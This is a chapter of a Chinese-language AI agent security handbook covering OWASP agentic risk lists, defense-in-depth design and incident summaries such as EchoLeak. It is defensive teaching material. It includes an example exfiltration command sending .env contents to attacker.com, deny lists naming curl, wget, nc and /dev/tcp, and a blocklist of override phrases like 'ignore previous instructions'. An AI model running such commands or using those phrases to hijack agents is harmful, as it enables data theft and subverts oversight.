22a - AI 安全概览

本文是《AI Agent 实战手册》第 22 章第 1 节。上一节：21f-生产告警与质量指标 | 下一节：22b-Agent权限控制 📖 返回总览与导航

⏱ 阅读时间：90 分钟 | 难度：⭐⭐⭐⭐⭐ 高级 | 前置知识：AI Agent 基础概念、LLM 应用开发经验、基本安全意识

概述

AI Agent 正从实验室走向生产环境，它们不再只是回答问题的聊天机器人，而是能够规划、决策、调用工具并自主执行多步任务的自治系统。这种自主性在带来巨大生产力的同时，也引入了全新的安全攻击面。2025 年底，OWASP 发布了专门针对 Agentic 应用的 Top 10 安全风险清单（ASI Top 10），标志着 AI 安全已从”模型安全”演进到”Agent 系统安全”。本节将系统梳理 Agent 时代的威胁模型、攻击面分析、两大 OWASP 安全框架，以及纵深防御架构设计，为后续章节（权限控制、数据隐私、Prompt 注入防御、红队测试、生产安全清单）奠定全局视角。

1. Agent 时代的安全范式转变

从 LLM 安全到 Agent 安全

传统 LLM 安全关注的是单次模型调用的输入/输出安全（如 Prompt 注入、有害内容生成）。而 Agent 安全需要关注一个完整的自治系统——它有目标、有记忆、能调用工具、能与其他 Agent 通信，甚至能自我修正和迭代。

一个简单的 Prompt 注入漏洞，在 LLM 应用中可能只导致一次不当回复；但在 Agent 系统中，它可能触发一连串自主操作：读取敏感文件 → 生成恶意代码 → 通过工具调用将数据外泄到外部服务器。这就是 OWASP 所说的”级联放大效应”。


传统 LLM 安全 vs Agent 安全对比

┌─────────────────────────────────────────────────────────────────┐
│                    传统 LLM 应用安全                              │
│  ┌──────────┐    ┌──────────┐    ┌──────────┐                   │
│  │ 用户输入  │───▶│ LLM 模型  │───▶│ 文本输出  │                   │
│  └──────────┘    └──────────┘    └──────────┘                   │
│  攻击面：Prompt 注入、有害内容、数据泄露                           │
│  影响范围：单次请求/响应                                          │
└─────────────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────────────┐
│                    Agent 系统安全                                 │
│  ┌──────────┐    ┌──────────┐    ┌──────────┐    ┌──────────┐  │
│  │ 用户输入  │───▶│ 规划器    │───▶│ 工具调用  │───▶│ 外部系统  │  │
│  └──────────┘    └─────┬────┘    └─────┬────┘    └──────────┘  │
│                        │               │                        │
│                   ┌────▼────┐    ┌─────▼────┐                   │
│                   │ 记忆系统 │    │ 其他Agent │                   │
│                   └─────────┘    └──────────┘                   │
│  攻击面：目标劫持、工具滥用、权限提升、供应链、记忆投毒、           │
│          级联故障、Agent间通信、信任利用、流氓Agent...              │
│  影响范围：整个系统 + 连接的外部服务                               │
└─────────────────────────────────────────────────────────────────┘

OWASP 提出的两大核心原则

OWASP Agentic Security Initiative 提出了两个指导性原则：

最小代理权限（Least-Agency）：最小权限原则的扩展。Agent 只应被授予完成其定义任务所需的最低自主权级别。不需要写文件的 Agent 就不应该有写权限；不需要网络访问的 Agent 就不应该能发起 HTTP 请求。
强可观测性（Strong Observability）：对 Agent 的目标状态、工具调用模式、决策路径进行全面、清晰的日志记录。这不是可选项，而是安全的基础设施。

工具推荐

工具	用途	价格	适用场景
Lakera Guard	Prompt 注入检测、数据泄露防护	免费（开发版）/ 企业版联系销售	LLM 应用实时防护
NVIDIA NeMo Guardrails	可编程 AI 安全护栏	免费（开源）	自定义安全策略
LLM Guard	输入/输出安全扫描	免费（开源）	自托管安全检测
Rebuff	Prompt 注入检测	免费（开源）	多层注入防御
Giskard	AI 模型安全测试	免费（开源）/ 企业版联系销售	红队测试、漏洞扫描
Prompt Security	企业级 AI 安全平台	企业版联系销售	全栈 AI 安全防护
Cisco AI Defense	Agentic AI 安全防护	企业版联系销售	供应链安全、工具生态防护
Snyk	供应链安全扫描	免费（基础版）/ Pro $25/月	MCP Server、Skills 安全审计
Langfuse	Agent 可观测性	免费（自托管）	行为审计、异常检测
Arize Phoenix	LLM 可观测性 + 漂移检测	免费（开源）	嵌入漂移、幻觉检测

2. Agent 系统完整攻击面分析

Agent 系统的攻击面远比传统 Web 应用复杂。以下是一个完整的威胁模型图，展示了攻击者可能利用的所有入口点：


Agent 系统攻击面全景图

                    ┌─────────────────────────────────┐
                    │         外部攻击者                │
                    └──────────┬──────────────────────┘
                               │
          ┌────────────────────┼────────────────────┐
          │                    │                    │
          ▼                    ▼                    ▼
   ┌──────────────┐   ┌──────────────┐   ┌──────────────┐
   │ ① 直接输入    │   │ ② 间接注入    │   │ ③ 供应链      │
   │  用户 Prompt  │   │  文档/邮件/   │   │  恶意 MCP    │
   │  API 调用     │   │  网页/日历    │   │  投毒插件     │
   └──────┬───────┘   └──────┬───────┘   │  篡改模型     │
          │                  │           └──────┬───────┘
          ▼                  ▼                  ▼
   ┌─────────────────────────────────────────────────┐
   │                  Agent 核心                       │
   │  ┌───────────┐  ┌───────────┐  ┌───────────┐    │
   │  │ ④ 规划器   │  │ ⑤ LLM 大脑│  │ ⑥ 记忆系统 │    │
   │  │ 目标劫持   │  │ 越狱/幻觉  │  │ 记忆投毒   │    │
   │  │ 任务篡改   │  │ 系统提示泄露│  │ 上下文污染  │    │
   │  └─────┬─────┘  └─────┬─────┘  └─────┬─────┘    │
   │        └──────────────┼──────────────┘           │
   └───────────────────────┼──────────────────────────┘
                           │
          ┌────────────────┼────────────────┐
          │                │                │
          ▼                ▼                ▼
   ┌──────────────┐ ┌──────────────┐ ┌──────────────┐
   │ ⑦ 工具层      │ │ ⑧ Agent通信  │ │ ⑨ 输出层     │
   │  工具滥用     │ │  中间人攻击   │ │  数据外泄     │
   │  权限提升     │ │  消息篡改     │ │  恶意代码     │
   │  代码执行     │ │  信任传递     │ │  社工攻击     │
   └──────┬───────┘ └──────┬───────┘ └──────┬───────┘
          │                │                │
          ▼                ▼                ▼
   ┌─────────────────────────────────────────────────┐
   │              外部系统 / 真实世界                    │
   │  数据库 · API · 文件系统 · 邮件 · 支付 · 基础设施   │
   └─────────────────────────────────────────────────┘

九大攻击面详解

编号	攻击面	攻击方式	潜在影响	严重度
①	直接输入	Prompt 注入、越狱、角色扮演	绕过安全策略、执行未授权操作	🔴 严重
②	间接注入	在文档/邮件/网页中嵌入恶意指令	零点击攻击、静默数据外泄	🔴 严重
③	供应链	恶意 MCP Server、投毒插件/Skills	后门植入、全面系统控制	🔴 严重
④	规划器	目标劫持、任务重定向	Agent 执行攻击者意图	🔴 严重
⑤	LLM 大脑	模型越狱、幻觉利用、系统提示泄露	安全策略失效、信息泄露	🟠 高
⑥	记忆系统	记忆投毒、上下文窗口污染	长期行为操纵、权限持久化	🟠 高
⑦	工具层	工具滥用、权限提升、RCE	数据破坏、系统入侵	🔴 严重
⑧	Agent 通信	中间人攻击、消息伪造、信任传递	多 Agent 系统全面沦陷	🟠 高
⑨	输出层	数据外泄、社会工程、恶意内容	数据泄露、用户欺骗	🟠 高

3. OWASP Top 10 for LLM Applications（2025 版）

OWASP 于 2025 年更新了 LLM 应用安全 Top 10，反映了 LLM 在真实世界部署中观察到的攻击模式。这是 Agent 安全的基础层。

编号	风险名称	核心描述
LLM01	Prompt 注入	恶意输入操纵模型行为，绕过安全策略
LLM02	敏感信息泄露	模型在响应中暴露训练数据、PII 或系统提示
LLM03	供应链漏洞	第三方模型、数据集、插件引入安全风险
LLM04	数据与模型投毒	恶意数据污染训练/微调过程，操纵模型行为
LLM05	不当输出处理	未经验证的模型输出被直接用于下游系统
LLM06	过度代理权限	模型被授予超出必要范围的功能、权限或自主性
LLM07	系统提示泄露	攻击者提取系统提示，了解安全策略和业务逻辑
LLM08	向量与嵌入弱点	RAG 系统中的向量存储被投毒或操纵
LLM09	错误信息（幻觉）	模型生成看似可信但实际错误的内容
LLM10	无界消耗	资源耗尽攻击导致服务降级或高额成本

操作步骤：快速安全自检

步骤 1：检查 Prompt 注入防护

确认你的应用是否对用户输入进行了安全过滤：


# 使用 LLM Guard 进行输入扫描示例
from llm_guard.input_scanners import PromptInjection, TokenLimit, Toxicity
 
# 初始化扫描器
scanners = [
    PromptInjection(threshold=0.9),
    TokenLimit(limit=4096),
    Toxicity(threshold=0.8),
]
 
def scan_input(user_prompt: str) -> tuple[str, bool]:
    """扫描用户输入，返回（清理后的文本, 是否安全）"""
    sanitized = user_prompt
    is_safe = True
    for scanner in scanners:
        sanitized, valid, risk_score = scanner.scan(sanitized)
        if not valid:
            is_safe = False
            print(f"⚠️ 检测到风险: {scanner.__class__.__name__}, 分数: {risk_score}")
    return sanitized, is_safe

步骤 2：审计工具权限

列出 Agent 可访问的所有工具，检查是否遵循最小权限原则：


# Agent 工具权限审计清单
agent_tools:
  - name: file_reader
    permissions: [read]
    scope: "/workspace/project/"  # 限定目录范围
    risk_level: low
    
  - name: code_executor
    permissions: [execute]
    scope: "sandboxed_container"  # 必须沙箱化
    risk_level: critical
    requires_approval: true       # 需要人工审批
    
  - name: web_browser
    permissions: [read]
    scope: "allowlisted_domains"  # 域名白名单
    risk_level: medium
    
  - name: database_query
    permissions: [read]           # 只读，禁止写入
    scope: "non_sensitive_tables" # 排除敏感表
    risk_level: medium

步骤 3：验证输出处理

确保 LLM 输出不会被直接注入到下游系统：


// 输出验证中间件示例
interface AgentOutput {
  action: string;
  parameters: Record<string, unknown>;
  reasoning: string;
}
 
function validateAgentOutput(output: AgentOutput): boolean {
  // 1. 检查 action 是否在允许列表中
  const allowedActions = ['search', 'summarize', 'draft_email', 'create_ticket'];
  if (!allowedActions.includes(output.action)) {
    console.error(`❌ 未授权的操作: ${output.action}`);
    return false;
  }
  
  // 2. 检查参数中是否包含可疑内容
  const paramStr = JSON.stringify(output.parameters);
  const suspiciousPatterns = [
    /eval\s*\(/i,
    /exec\s*\(/i,
    /<script/i,
    /\bDROP\s+TABLE\b/i,
    /\bDELETE\s+FROM\b/i,
  ];
  
  for (const pattern of suspiciousPatterns) {
    if (pattern.test(paramStr)) {
      console.error(`❌ 检测到可疑参数模式: ${pattern}`);
      return false;
    }
  }
  
  return true;
}

4. OWASP Top 10 for Agentic Applications（2026 版 / ASI Top 10）

2025 年 12 月，OWASP GenAI Security Project 发布了专门针对 Agentic 应用的 Top 10（ASI Top 10），这是业界首个系统化的 Agent 安全风险分类框架。它从 LLM 的被动风险转向 Agent 的主动行为风险，将 Agent 视为拥有目标、工具、记忆和通信协议的独立主体。


OWASP ASI Top 10 风险全景

  严重度 ▲
         │
  致命   │  ┌──────────┐  ┌──────────┐  ┌──────────┐
         │  │ ASI01    │  │ ASI02    │  │ ASI05    │
         │  │ 目标劫持  │  │ 工具滥用  │  │ 代码执行  │
         │  └──────────┘  └──────────┘  └──────────┘
         │
  严重   │  ┌──────────┐  ┌──────────┐  ┌──────────┐
         │  │ ASI03    │  │ ASI04    │  │ ASI10    │
         │  │ 身份滥用  │  │ 供应链    │  │ 流氓Agent │
         │  └──────────┘  └──────────┘  └──────────┘
         │
  高     │  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐
         │  │ ASI06    │  │ ASI07    │  │ ASI08    │  │ ASI09    │
         │  │ 记忆投毒  │  │ 通信不安全│  │ 级联故障  │  │ 信任利用  │
         │  └──────────┘  └──────────┘  └──────────┘  └──────────┘
         │
         └──────────────────────────────────────────────────▶ 攻击复杂度
                低                                    高

ASI Top 10 详解

编号	风险名称	描述	真实案例
ASI01	Agent 目标劫持	攻击者通过间接手段操纵 Agent 的核心目标和决策路径。不同于传统 Prompt 注入，目标劫持捕获的是 Agent 多步行为的全局重定向	EchoLeak：攻击者发送含隐藏载荷的邮件，Microsoft 365 Copilot 处理时静默外泄机密邮件和聊天记录，用户全程无感知
ASI02	工具滥用与利用	Agent 因模糊指令或过度权限而不安全地使用合法工具	域名仿冒：Agent 被诱导调用 `report` 而非 `report_finance`，导致数据泄露；DNS 外泄：编码 Agent 被诱导通过 ping 工具经 DNS 查询外泄数据
ASI03	身份与权限滥用	Agent 在”归属空白”中运行，动态管理权限却缺乏独立的受治理身份	混淆代理人：低权限 Agent 向高权限 Agent 传递看似合法的指令，后者未重新验证用户原始意图即执行转账
ASI04	供应链漏洞	Agent 在运行时动态组合能力，加载的第三方工具或数据可能已被篡改	MCP 冒充：恶意 MCP Server 伪装成合法服务，Agent 连接后所有工具调用被中间人截获
ASI05	意外代码执行（RCE）	Agent 执行由 LLM 生成或外部提供的代码，导致远程代码执行	编码 Agent 执行了从不可信来源获取的代码片段，攻击者获得宿主机 shell 访问权限
ASI06	记忆与上下文投毒	攻击者污染 Agent 的短期或长期记忆，影响后续决策	IT Agent 在补丁周期中缓存了 SSH 凭证，后来非管理员用户诱导 Agent 复用该会话创建未授权账户
ASI07	不安全的 Agent 间通信	多 Agent 系统中缺乏认证、加密或消息完整性验证	Agent A 向 Agent B 发送伪造的任务委托，B 信任内部消息并执行了特权操作
ASI08	级联故障	单个 Agent 的漏洞或故障在互联的 Agent 生态中放大传播	一个被入侵的 Agent 向其他 Agent 传播恶意指令，导致整个 Agent 集群行为异常
ASI09	人-Agent 信任利用	攻击者利用用户对 Agent 的信任进行社会工程攻击	Agent 被操纵后以可信身份向用户发送钓鱼链接，用户因信任 Agent 而点击
ASI10	流氓 Agent	Agent 脱离预期行为边界，自主执行未授权操作	Agent 在自我修正循环中不断提升自身权限，最终获得超出设计范围的系统访问权

提示词模板：Agent 安全威胁评估


你是一位 AI 安全专家。请对以下 Agent 系统进行安全威胁评估。

## 系统描述
- Agent 名称：[Agent名称]
- 核心功能：[功能描述]
- 可用工具：[工具列表，如：文件读写、代码执行、API调用、数据库查询]
- 记忆类型：[短期上下文 / 长期向量存储 / 无]
- 是否多 Agent：[是/否，如是请描述通信方式]
- 部署环境：[云端/本地/混合]
- 用户群体：[内部员工/外部客户/开发者]

## 请按以下框架分析

### 1. 攻击面识别
针对 OWASP ASI Top 10 的每一项，评估该系统的暴露程度（高/中/低/不适用）。

### 2. 高优先级风险
列出 TOP 3 最可能被利用的攻击向量，包含：
- 攻击场景描述
- 潜在影响
- 利用难度

### 3. 缓解建议
针对每个高优先级风险，提供具体的缓解措施和实施优先级。

### 4. 安全架构建议
基于分析结果，推荐适合该系统的安全架构模式。

5. 纵深防御架构

Agent 安全不能依赖单一防线，必须采用纵深防御（Defense-in-Depth）策略，在每一层都设置安全控制。


Agent 纵深防御架构

┌─────────────────────────────────────────────────────────────┐
│                    第 1 层：边界防御                           │
│  ┌─────────────────────────────────────────────────────┐    │
│  │ • 输入验证与清洗        • 速率限制与配额              │    │
│  │ • Prompt 注入检测       • 认证与授权                  │    │
│  │ • 内容安全过滤          • IP/地理围栏                 │    │
│  └─────────────────────────────────────────────────────┘    │
│                                                             │
│                    第 2 层：Agent 核心防御                    │
│  ┌─────────────────────────────────────────────────────┐    │
│  │ • 系统提示加固          • 目标完整性验证（Intent Capsule）│  │
│  │ • 上下文隔离            • 输出验证与过滤              │    │
│  │ • 幻觉检测              • 行为基线监控                │    │
│  └─────────────────────────────────────────────────────┘    │
│                                                             │
│                    第 3 层：工具与权限防御                    │
│  ┌─────────────────────────────────────────────────────┐    │
│  │ • 最小权限工具配置       • 沙箱执行环境               │    │
│  │ • 工具调用审批流程       • 参数验证与范围限制          │    │
│  │ • 工具白名单            • 敏感操作二次确认             │    │
│  └─────────────────────────────────────────────────────┘    │
│                                                             │
│                    第 4 层：数据与记忆防御                    │
│  ┌─────────────────────────────────────────────────────┐    │
│  │ • PII 检测与脱敏        • 记忆完整性校验              │    │
│  │ • 数据分类与标签         • 向量存储访问控制            │    │
│  │ • 数据驻留合规          • 上下文窗口清理               │    │
│  └─────────────────────────────────────────────────────┘    │
│                                                             │
│                    第 5 层：可观测性与响应                    │
│  ┌─────────────────────────────────────────────────────┐    │
│  │ • 全链路追踪            • 异常行为告警                │    │
│  │ • 审计日志              • 事件响应自动化              │    │
│  │ • 漂移检测              • 安全仪表板                  │    │
│  └─────────────────────────────────────────────────────┘    │
└─────────────────────────────────────────────────────────────┘

操作步骤：构建纵深防御

步骤 1：部署输入层防护


# 多层输入防护管线
from dataclasses import dataclass
from enum import Enum
 
class RiskLevel(Enum):
    SAFE = "safe"
    SUSPICIOUS = "suspicious"
    BLOCKED = "blocked"
 
@dataclass
class ScanResult:
    risk_level: RiskLevel
    details: list[str]
    sanitized_input: str
 
class InputDefensePipeline:
    """Agent 输入防御管线 - 多层过滤"""
    
    def __init__(self):
        self.layers = [
            self._check_token_limit,
            self._detect_prompt_injection,
            self._check_pii_leakage,
            self._validate_content_policy,
        ]
    
    def scan(self, user_input: str) -> ScanResult:
        details = []
        sanitized = user_input
        risk = RiskLevel.SAFE
        
        for layer in self.layers:
            result = layer(sanitized)
            if result.risk_level == RiskLevel.BLOCKED:
                return result  # 立即阻断
            if result.risk_level == RiskLevel.SUSPICIOUS:
                risk = RiskLevel.SUSPICIOUS
                details.extend(result.details)
            sanitized = result.sanitized_input
        
        return ScanResult(risk, details, sanitized)
    
    def _check_token_limit(self, text: str) -> ScanResult:
        """防止 token 耗尽攻击"""
        if len(text) > 10000:
            return ScanResult(RiskLevel.BLOCKED, ["输入超过长度限制"], text[:10000])
        return ScanResult(RiskLevel.SAFE, [], text)
    
    def _detect_prompt_injection(self, text: str) -> ScanResult:
        """检测常见 Prompt 注入模式"""
        injection_patterns = [
            "ignore previous instructions",
            "ignore all prior",
            "you are now",
            "system prompt",
            "reveal your instructions",
            "disregard above",
        ]
        text_lower = text.lower()
        found = [p for p in injection_patterns if p in text_lower]
        if found:
            return ScanResult(
                RiskLevel.BLOCKED,
                [f"检测到注入模式: {', '.join(found)}"],
                text
            )
        return ScanResult(RiskLevel.SAFE, [], text)
    
    def _check_pii_leakage(self, text: str) -> ScanResult:
        """检测 PII 泄露风险"""
        # 实际生产中应使用专业 PII 检测库
        import re
        pii_patterns = {
            "email": r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',
            "phone": r'\b\d{3}[-.]?\d{4}[-.]?\d{4}\b',
            "ssn": r'\b\d{3}-\d{2}-\d{4}\b',
        }
        found_pii = []
        for pii_type, pattern in pii_patterns.items():
            if re.search(pattern, text):
                found_pii.append(pii_type)
        
        if found_pii:
            return ScanResult(
                RiskLevel.SUSPICIOUS,
                [f"检测到 PII: {', '.join(found_pii)}"],
                text
            )
        return ScanResult(RiskLevel.SAFE, [], text)
    
    def _validate_content_policy(self, text: str) -> ScanResult:
        """内容策略验证"""
        # 实际生产中应调用内容安全 API
        return ScanResult(RiskLevel.SAFE, [], text)

步骤 2：配置工具层安全


// 工具调用安全中间件
interface ToolCall {
  toolName: string;
  parameters: Record<string, unknown>;
  callerAgent: string;
  timestamp: number;
}
 
interface ToolPolicy {
  allowedTools: string[];
  requiresApproval: string[];     // 需要人工审批的工具
  maxCallsPerMinute: number;
  parameterValidators: Record<string, (params: Record<string, unknown>) => boolean>;
}
 
class ToolSecurityGateway {
  private policy: ToolPolicy;
  private callHistory: ToolCall[] = [];
 
  constructor(policy: ToolPolicy) {
    this.policy = policy;
  }
 
  async validateToolCall(call: ToolCall): Promise<{
    allowed: boolean;
    reason?: string;
    requiresApproval?: boolean;
  }> {
    // 1. 白名单检查
    if (!this.policy.allowedTools.includes(call.toolName)) {
      return { allowed: false, reason: `工具 ${call.toolName} 不在白名单中` };
    }
 
    // 2. 速率限制
    const recentCalls = this.callHistory.filter(
      c => c.timestamp > Date.now() - 60_000
    );
    if (recentCalls.length >= this.policy.maxCallsPerMinute) {
      return { allowed: false, reason: '超过每分钟调用限制' };
    }
 
    // 3. 参数验证
    const validator = this.policy.parameterValidators[call.toolName];
    if (validator && !validator(call.parameters)) {
      return { allowed: false, reason: `工具 ${call.toolName} 参数验证失败` };
    }
 
    // 4. 审批检查
    if (this.policy.requiresApproval.includes(call.toolName)) {
      return { allowed: true, requiresApproval: true };
    }
 
    // 记录调用历史
    this.callHistory.push(call);
    return { allowed: true };
  }
}

步骤 3：启用全链路审计


# Agent 行为审计日志
import json
import time
from datetime import datetime, timezone
 
class AgentAuditLogger:
    """Agent 安全审计日志器"""
    
    def __init__(self, agent_id: str, log_sink: str = "stdout"):
        self.agent_id = agent_id
        self.log_sink = log_sink
        self.session_id = self._generate_session_id()
    
    def log_event(self, event_type: str, details: dict):
        """记录安全相关事件"""
        event = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "agent_id": self.agent_id,
            "session_id": self.session_id,
            "event_type": event_type,
            "details": details,
        }
        self._emit(event)
    
    def log_tool_call(self, tool_name: str, params: dict, result: str, approved: bool):
        """记录工具调用"""
        self.log_event("tool_call", {
            "tool": tool_name,
            "parameters": self._redact_sensitive(params),
            "result_summary": result[:200],
            "approved": approved,
        })
    
    def log_security_alert(self, alert_type: str, severity: str, description: str):
        """记录安全告警"""
        self.log_event("security_alert", {
            "alert_type": alert_type,
            "severity": severity,
            "description": description,
        })
    
    def _redact_sensitive(self, data: dict) -> dict:
        """脱敏处理"""
        sensitive_keys = {"password", "token", "secret", "key", "credential"}
        return {
            k: "***REDACTED***" if k.lower() in sensitive_keys else v
            for k, v in data.items()
        }
    
    def _generate_session_id(self) -> str:
        return f"{self.agent_id}-{int(time.time())}"
    
    def _emit(self, event: dict):
        print(json.dumps(event, ensure_ascii=False, indent=2))

提示词模板：纵深防御架构设计


你是一位 AI 安全架构师。请为以下 Agent 系统设计纵深防御方案。

## 系统信息
- 系统类型：[客服Agent / 编码Agent / 数据分析Agent / 自动化工作流Agent]
- 部署环境：[公有云 / 私有云 / 混合]
- 用户规模：[日活用户数]
- 数据敏感度：[低 / 中 / 高 / 极高]
- 合规要求：[GDPR / SOC 2 / HIPAA / EU AI Act / 无特殊要求]
- 现有安全措施：[列出已有的安全控制]

## 请输出

### 1. 五层防御方案
针对每一层（边界、Agent核心、工具权限、数据记忆、可观测性），列出：
- 具体安全控制措施
- 推荐工具和配置
- 实施优先级（P0/P1/P2）

### 2. 安全策略配置
提供关键安全策略的配置模板（YAML 格式）。

### 3. 监控告警规则
定义关键安全指标和告警阈值。

### 4. 事件响应预案
针对 TOP 3 威胁场景的响应流程。

6. 真实安全事件与供应链威胁

2025 年重大 AI 安全事件

了解真实攻击案例是理解威胁的最佳方式。以下是 2025 年发生的几起标志性事件：

IDEsaster 漏洞群（2025 年 12 月）

安全研究项目”IDEsaster”在主流 AI 编码平台中发现了超过 30 个漏洞，产生了 24 个 CVE。其中最严重的是 GitHub Copilot 中的 CamoLeak 漏洞（CVSS 9.6），攻击者可以静默地从私有仓库中窃取密钥和源代码。这一事件揭示了 AI 编码助手的攻击面远比预期更大。

EchoLeak 零点击攻击（CVE-2025-32711）

Microsoft 365 Copilot 遭受零点击 Prompt 注入攻击，攻击者无需任何用户交互即可外泄组织数据。攻击载荷隐藏在普通邮件中，当 Copilot 处理邮件时自动触发。

Langflow 未授权代码注入

CrowdStrike 观察到多个威胁行为者利用 Langflow 中的未认证代码注入漏洞在野外部署恶意软件。这是 Agent 框架供应链风险的典型案例。

Skills/MCP 供应链威胁

Snyk 的研究表明，使 Agent 强大的架构——Skills 扩展能力、MCP Server 连接外部工具、Channel 桥接消息平台——同时也创造了广阔的攻击面。恶意 SKILL.md 文件可以在三行 Markdown 中从技能定义升级到 Shell 访问权限。

供应链攻击向量


Agent 供应链攻击路径

┌──────────────┐     ┌──────────────┐     ┌──────────────┐
│  模型供应链    │     │  工具供应链    │     │  数据供应链    │
│              │     │              │     │              │
│ • 投毒模型    │     │ • 恶意 MCP   │     │ • 投毒训练数据 │
│ • 后门微调    │     │ • 仿冒插件    │     │ • 污染向量库   │
│ • 模型替换    │     │ • 恶意 Skills │     │ • 篡改文档     │
│ • 量化陷阱    │     │ • 依赖劫持    │     │ • 注入日历/邮件│
└──────┬───────┘     └──────┬───────┘     └──────┬───────┘
       │                    │                    │
       └────────────────────┼────────────────────┘
                            │
                            ▼
                   ┌──────────────────┐
                   │  Agent 系统被入侵  │
                   │                  │
                   │ • 数据外泄        │
                   │ • 恶意代码执行     │
                   │ • 权限提升        │
                   │ • 横向移动        │
                   └──────────────────┘

实战案例：为编码 Agent 构建安全防护

场景描述

你的团队部署了一个编码 Agent，它可以读写项目文件、执行终端命令、查询文档。你需要为它设计安全防护方案。

威胁分析


# 编码 Agent 威胁分析
agent_profile:
  name: "CodingAssistant"
  capabilities:
    - file_read_write
    - terminal_execution
    - web_search
    - documentation_query
  
threat_assessment:
  ASI01_goal_hijack: HIGH
    # 恶意代码注释或文档中可能包含隐藏指令
    scenario: "项目中的 README.md 包含隐藏的 Prompt 注入"
    
  ASI02_tool_misuse: CRITICAL
    # 终端执行权限可被滥用
    scenario: "Agent 被诱导执行 `curl attacker.com/exfil?data=$(cat .env)`"
    
  ASI04_supply_chain: HIGH
    # 依赖的 MCP Server 或 Skills 可能被篡改
    scenario: "恶意 npm 包在安装脚本中注入后门"
    
  ASI05_code_execution: CRITICAL
    # 代码执行是核心功能，也是最大风险
    scenario: "Agent 执行 LLM 生成的恶意代码片段"

防护方案


# 编码 Agent 安全配置
security_config:
  # 第 1 层：输入防护
  input_defense:
    prompt_injection_detection: true
    max_input_length: 8192
    file_content_scanning: true  # 扫描读取的文件内容
    
  # 第 2 层：Agent 核心
  agent_core:
    system_prompt_hardening: true
    output_validation: true
    hallucination_detection: true
    
  # 第 3 层：工具权限
  tool_permissions:
    file_system:
      allowed_paths: ["/workspace/project/"]
      denied_paths: ["~/.ssh/", "~/.aws/", ".env", ".env.*"]
      max_file_size: "10MB"
      
    terminal:
      sandboxed: true  # Docker/gVisor 沙箱
      allowed_commands: ["npm", "node", "python", "git", "cargo", "make"]
      denied_commands: ["curl", "wget", "ssh", "scp", "nc", "rm -rf /"]
      denied_patterns: ["| base64", "> /dev/tcp", "$(cat .env)"]
      timeout: 30  # 秒
      requires_approval:
        - "npm install"    # 安装新依赖需审批
        - "git push"       # 推送代码需审批
        - "rm -rf"         # 删除操作需审批
        
    web_search:
      allowed_domains: ["docs.python.org", "developer.mozilla.org", "stackoverflow.com"]
      
  # 第 4 层：数据防护
  data_protection:
    pii_detection: true
    secret_scanning: true
    output_redaction: true
    
  # 第 5 层：可观测性
  observability:
    audit_logging: true
    tool_call_tracing: true
    anomaly_detection: true
    alert_channels: ["slack", "pagerduty"]

案例分析

这个案例展示了几个关键决策点：

终端命令白名单 vs 黑名单：采用白名单策略（只允许已知安全的命令），而非黑名单（试图阻止所有危险命令）。黑名单永远不完整，攻击者总能找到绕过方式。
分级审批：不是所有操作都需要人工审批（那样会严重影响效率），而是只对高风险操作（安装依赖、推送代码、删除文件）要求审批。
沙箱隔离：终端执行在 Docker 容器中进行，即使发生 RCE，攻击者也被限制在容器内，无法访问宿主机。
文件路径限制：明确禁止访问 SSH 密钥、AWS 凭证、环境变量文件等敏感路径。

避坑指南

❌ 常见错误

只依赖 Prompt 层防护
- 问题：仅在系统提示中写”不要执行危险操作”，这种防护极易被绕过。LLM 的指令遵循是概率性的，不是确定性的安全边界。
- 正确做法：Prompt 层防护只是第一道防线，必须在工具层、网络层、操作系统层都设置硬性安全控制。安全策略应该由代码强制执行，而非依赖 LLM 的”自觉”。
给 Agent 过度权限
- 问题：为了方便开发，给 Agent 管理员级别的数据库权限、root 级别的文件系统访问、不受限的网络访问。“先跑起来再说安全”的心态。
- 正确做法：从零权限开始，逐步添加 Agent 完成任务所需的最小权限。每个工具调用都应该有明确的范围限制。使用只读凭证、限定目录、域名白名单。
忽视供应链安全
- 问题：直接使用未经审计的第三方 MCP Server、社区 Skills、开源插件，不检查其代码和权限要求。
- 正确做法：对所有第三方组件进行安全审计。检查 MCP Server 的权限声明、Skills 的文件访问范围、插件的网络请求。使用 Snyk 等工具扫描依赖漏洞。建立内部审批流程。
没有审计日志
- 问题：Agent 在生产环境中运行，但没有记录它做了什么、调用了哪些工具、访问了哪些数据。出了安全事件无法溯源。
- 正确做法：记录 Agent 的每一次工具调用、每一次外部请求、每一次数据访问。日志应包含时间戳、调用者身份、操作内容、结果。日志应存储在 Agent 无法修改的独立系统中。
信任 Agent 间通信
- 问题：在多 Agent 系统中，Agent 之间的消息传递没有认证和验证。一个被入侵的 Agent 可以向其他 Agent 发送任意指令。
- 正确做法：Agent 间通信应有签名验证、权限检查、消息完整性校验。高权限 Agent 收到来自低权限 Agent 的请求时，必须重新验证原始用户意图。

✅ 最佳实践

采用”零信任”思维：不信任任何输入（包括来自其他 Agent 的消息），每一层都独立验证。
安全左移：在设计阶段就考虑安全，而非部署后再补。使用威胁建模（如 STRIDE）分析 Agent 系统。
定期红队测试：模拟攻击者对 Agent 系统进行渗透测试，发现防御盲点（详见 22e-AI-Agent红队测试）。
保持更新：AI 安全是快速演进的领域，定期关注 OWASP、NIST、MITRE 的最新发布。
人在回路：对高风险操作保持人工审批，不要完全信任 Agent 的自主决策。

参考来源

OWASP Top 10 for Agentic Applications 2026 深度解析（2025-12）
OWASP Top 10 for Agentic Application 2026 风险总结（2025-12）
OWASP Top 10 2025 for LLM Applications: Risks and Mitigation （2025-06）
AI Agent Security Best Practices 2025 （2025-12）
Agentic AI Threat Landscape （2026-02）
Palo Alto Unit 42: AI Agents Are Here. So Are the Threats. （2025-05）
Snyk: From SKILL.md to Shell Access — Threat Modeling Agent Skills （2026-02）
Cisco AI Defense for the Agentic Era （2026-02）
AI Threat Modeling Must Include Supply Chains, Agents, and Human Risk （2026-02）
Securing AI Agents Against Prompt Injection Attacks (arXiv) （2025）

📖 返回总览与导航 | 上一节：21f-生产告警与质量指标 | 下一节：22b-Agent权限控制